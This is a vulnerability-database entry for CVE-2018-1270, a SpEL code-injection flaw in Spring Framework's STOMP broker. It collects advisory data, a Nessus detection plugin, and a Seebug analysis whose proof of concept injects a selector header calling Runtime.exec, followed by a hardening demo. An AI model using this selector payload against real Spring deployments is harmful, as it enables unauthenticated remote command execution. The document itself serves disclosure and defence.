Vulnerabilities > CVE-2018-1270 - Code Injection vulnerability in multiple products

CVSS 9.8 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH

Tags: network, low complexity, vmware, oracle, redhat, debian, CWE-94, critical, nessus, exploit available

Summary

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.

Vulnerable Configurations

Part         Description   Count
Application  Vmware        120
Application  Oracle        78
Application  Redhat        1
OS           Debian        1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file), the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated, mashing up resources from local and remote sources, the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing a buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028, where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/): http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server; adding the role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when it is manipulated, the attacker gains full control.
  • Manipulating User-Controlled Variables
    This attack targets user-controlled variables (DEBUG=1, PHP Globals, and so forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

Exploit-Db

  • description: Pivotal Spring Java Framework < 5.0 - Remote Code Execution. CVE-2018-1270. Webapps exploit for Java platform
    id: EDB-ID:44796
    last seen: 2018-05-29
    modified: 2018-05-29
    published: 2018-05-29
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/44796/
    title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution

Nessus

NASL family: Misc.
NASL id: SPRING_CVE-2018-1270.NASL
description: The remote host contains a Spring Framework library version that is 4.3.x prior to 4.3.16 or 5.0.x prior to 5.0.5. It is, therefore, affected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this by sending a specially crafted message to the broker that can lead to an RCE attack.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 129500
published: 2019-10-02
reporter: This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/129500
title: Spring Framework 4.3.x < 4.3.16 / 5.0.x < 5.0.5 Remote Code Execution with spring-messaging (CVE-2018-1270)
code:
```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(129500);
  script_version("1.2");
  script_cvs_date("Date: 2019/10/04  9:39:50");

  script_cve_id("CVE-2018-1270");

  script_name(english:"Spring Framework 4.3.x < 4.3.16 / 5.0.x < 5.0.5 Remote Code Execution with spring-messaging (CVE-2018-1270)");
  script_summary(english:"Checks version of Spring Framework.");

  script_set_attribute(attribute:"synopsis", value:
"The remote Windows host contains a web application framework library that is
affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host contains a Spring Framework library version that is
4.3.x prior to 4.3.16 or 5.0.x prior to 5.0.5. It is, therefore,
affected by a remote code execution vulnerability. An unauthenticated,
remote attacker can exploit this, by sending a special craft message
to the broker that can lead to RCE attack");

  # https://pivotal.io/security/cve-2018-1270
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c6875af7");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Spring Framework version 4.3.16 or 5.0.5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-1270");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/04/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/10/02");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:pivotal_software:spring_framework");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("spring_jar_detection.nbin");
  exit(0);
}

include("vcf.inc");

app_info = vcf::combined_get_app_info(app:'Spring Framework');

constraints = [
  { 'min_version':'4.3', 'fixed_version':'4.3.16' },
  { 'min_version':'5.0', 'fixed_version':'5.0.5' }
];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
```

Packetstorm

data source: https://packetstormsecurity.com/files/download/147974/psjf-exec.txt
id: PACKETSTORM:147974
last seen: 2018-05-31
published: 2018-05-29
reporter: JameelNabbo
source: https://packetstormsecurity.com/files/147974/Pivotal-Spring-Java-Framework-5.0.x-Remote-Code-Execution.html
title: Pivotal Spring Java Framework 5.0.x Remote Code Execution

Redhat

advisories: rhsa
id: RHSA-2018:2939

Seebug

bulletinFamily: exploit
description:

### Vulnerability advisory

The vulnerability was published on 5 April 2018: https://pivotal.io/security/cve-2018-1270

![](https://images.seebug.org/1523153473144)

### Affected versions

* Spring Framework 5.0 to 5.0.4
* Spring Framework 4.3 to 4.3.14
* Older unsupported versions are also affected

### Environment setup

Use the official sample https://github.com/spring-guides/gs-messaging-stomp-websocket; after cloning, check out the commit that predates the fix:

```
git clone https://github.com/spring-guides/gs-messaging-stomp-websocket
git checkout 6958af0b02bf05282673826b73cd7a85e84c12d3
```

Open the `complete` project under the gs-messaging-stomp-websocket directory in IDEA and modify line 15 of app.js:

```
function connect() {
    var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"};
    var socket = new SockJS('/gs-guide-websocket');
    stompClient = Stomp.over(socket);
    stompClient.connect({}, function (frame) {
        setConnected(true);
        console.log('Connected: ' + frame);
        stompClient.subscribe('/topic/greetings', function (greeting) {
            showGreeting(JSON.parse(greeting.body).content);
        }, header);
    });
}
```

This adds a header that specifies a selector; its value is the payload.

### Exploitation

Click Connect to establish the connection, type anything into the text box and click Send; this triggers the PoC:

![](https://images.seebug.org/1523153519476)

### Analysis

When Connect is clicked on http://localhost:8080/, the following code in app.js establishes the WebSocket connection:

```
var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"};
...
stompClient.subscribe('/topic/greetings', function (greeting) {
    showGreeting(JSON.parse(greeting.body).content);
}, header);
```

The `header` specifies a `selector`. According to the Stomp Protocol Specification, Version 1.0, a subscription's messages can be filtered by specifying the corresponding selector:

```
Stomp brokers may support the selector header which allows you to specify an SQL 92 selector on the message headers which acts as a filter for content based routing. You can also specify an id header which can then later on be used to UNSUBSCRIBE from the specific subscription as you may end up with overlapping subscriptions using selectors with the same destination.
If an id header is supplied then Stomp brokers should append a subscription header to any MESSAGE commands which are sent to the client so that the client knows which subscription the message relates to. If using Wildcards and selectors this can help clients figure out what subscription caused the message to be created.
```

At line 140 of org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java, this header parameter is accepted and processed:

```
protected void addSubscriptionInternal(
        String sessionId, String subsId, String destination, Message<?> message) {
    Expression expression = null;
    MessageHeaders headers = message.getHeaders();
    String selector = SimpMessageHeaderAccessor.getFirstNativeHeader(getSelectorHeaderName(), headers);
    if (selector != null) {
        try {
            expression = this.expressionParser.parseExpression(selector);
            this.selectorHeaderInUse = true;
            if (logger.isTraceEnabled()) {
                logger.trace("Subscription selector: [" + selector + "]");
            }
        }
        catch (Throwable ex) {
            if (logger.isDebugEnabled()) {
                logger.debug("Failed to parse selector: " + selector, ex);
            }
        }
    }
    this.subscriptionRegistry.addSubscription(sessionId, subsId, destination, expression);
    this.destinationCache.updateAfterNewSubscription(destination, sessionId, subsId);
}
```

![](https://images.seebug.org/1523153570687)

As the screenshot shows, the sessionId for this connection is `mrzfa005` and the subsId is `sub-0`.

Next, type an arbitrary string at http://localhost:8080/ and click Send. After a series of processing steps, Spring begins distributing the message to its subscribers, at line 349 of org/springframework/messaging/simp/broker/SimpleBrokerMessageHandler.java:

```
protected void sendMessageToSubscribers(@Nullable String destination, Message<?> message) {
    MultiValueMap<String,String> subscriptions = this.subscriptionRegistry.findSubscriptions(message);
    ...
```

Here `message` holds the information about this connection/session:

![](https://images.seebug.org/1523153607905)

Following `this.subscriptionRegistry.findSubscriptions` leads to line 111 of org/springframework/messaging/simp/broker/AbstractSubscriptionRegistry.java:

```
public final MultiValueMap<String, String> findSubscriptions(Message<?> message) {
    ....
    return findSubscriptionsInternal(destination, message);
}
```

`message` is passed as a parameter to `findSubscriptionsInternal`; following the return statement leads to line 184 of org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java:

```
protected MultiValueMap<String, String> findSubscriptionsInternal(String destination, Message<?> message) {
    MultiValueMap<String, String> result = this.destinationCache.getSubscriptions(destination, message);
    return filterSubscriptions(result, message);
}
```

The value of the `result` variable is as follows:

![](https://images.seebug.org/1523153643703)

This variable is the `allMatches` variable of the filterSubscriptions method at line 201 of org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java; follow it into the two nested for loops:

```
for (String sessionId : allMatches.keySet()) {
    for (String subId : allMatches.get(sessionId)) {
        SessionSubscriptionInfo info = this.subscriptionRegistry.getSubscriptions(sessionId);
        if (info == null) {
            continue;
        }
        Subscription sub = info.getSubscription(subId);
        if (sub == null) {
            continue;
        }
        ...
    }
}
```

Through the two `getSubscriptions` calls, the configuration stored earlier is retrieved; the value of the `sub` variable is as follows:

![](https://images.seebug.org/1523153691361)

Line 207 then extracts the selector expression:

```
Expression expression = sub.getSelectorExpression();
```

Line 217:

```
try {
    if (Boolean.TRUE.equals(expression.getValue(context, Boolean.class))) {
        result.add(sessionId, subId);
    }
}
```

The call to expression.getValue(context, Boolean.class) triggers the payload: the SpEL expression is evaluated and remote command execution succeeds.

![](https://images.seebug.org/1523153719709)

id: SSV:97214
last seen: 2018-06-26
modified: 2018-04-08
published: 2018-04-08
reporter: My Seebug
title: spring-messaging Remote Code Execution(CVE-2018-1270)
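The root cause in the Seebug analysis above is that a client-supplied selector is parsed as SpEL and then evaluated in a context that can resolve `T(...)` type references and call arbitrary methods. The following is an added example, not code from Seebug or from the Spring Framework, that evaluates the same kind of selector string against a constructed `Headers` root object twice: once in an unrestricted StandardEvaluationContext (the pre-fix shape) and once in SimpleEvaluationContext, the restricted context Spring provides for untrusted expressions. The `Headers` class, the `SelectorContextDemo` class and both selector strings are constructed samples.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SelectorContextDemo {

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Constructed stand-in for the message headers a selector is supposed to filter on.
    public static class Headers {
        private final String type;
        public Headers(String type) { this.type = type; }
        public String getType() { return type; }
    }

    // Pre-fix shape: a full StandardEvaluationContext, in which T(...) type references,
    // constructors and arbitrary method calls on the resolved objects all resolve.
    public static Boolean evaluateUnrestricted(String selector, Headers root) {
        Expression expr = PARSER.parseExpression(selector);
        EvaluationContext ctx = new StandardEvaluationContext(root);
        return expr.getValue(ctx, Boolean.class);
    }

    // Hardened shape: SimpleEvaluationContext exposes only property reads on the root
    // object and has no TypeLocator, so T(...) throws instead of resolving a class.
    public static Boolean evaluateRestricted(String selector, Headers root) {
        Expression expr = PARSER.parseExpression(selector);
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding()
                .withRootObject(root)
                .build();
        return expr.getValue(ctx, Boolean.class);
    }

    public static void main(String[] args) {
        Headers headers = new Headers("greeting");
        String legitimate = "type == 'greeting'";               // a genuine header filter
        String typeReference = "T(java.lang.Runtime) != null"; // harmless probe: only tests type resolution

        System.out.println("restricted, legitimate filter: " + evaluateRestricted(legitimate, headers));
        System.out.println("unrestricted, T(...) probe   : " + evaluateUnrestricted(typeReference, headers));
        try {
            evaluateRestricted(typeReference, headers);
            System.out.println("restricted, T(...) probe     : resolved (unexpected)");
        } catch (SpelEvaluationException e) {
            System.out.println("restricted, T(...) probe     : rejected, " + e.getMessageCode());
        }
    }
}
```

Requires a spring-expression version that ships SimpleEvaluationContext (the patched 4.3.x and 5.0.x lines do) on the classpath; the legitimate filter still works in the restricted context, which is the property a patched broker relies on.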

The Hacker News

id: THN:D7C30FB307A1DC524FADFFBF2D1BEAB1
last seen: 2018-04-06
modified: 2018-04-06
published: 2018-04-05
reporter: Swati Khandelwal
source: https://thehackernews.com/2018/04/spring-framework-hacking.html
title: Remote Execution Flaw Threatens Apps Built Using Spring Framework — Patch Now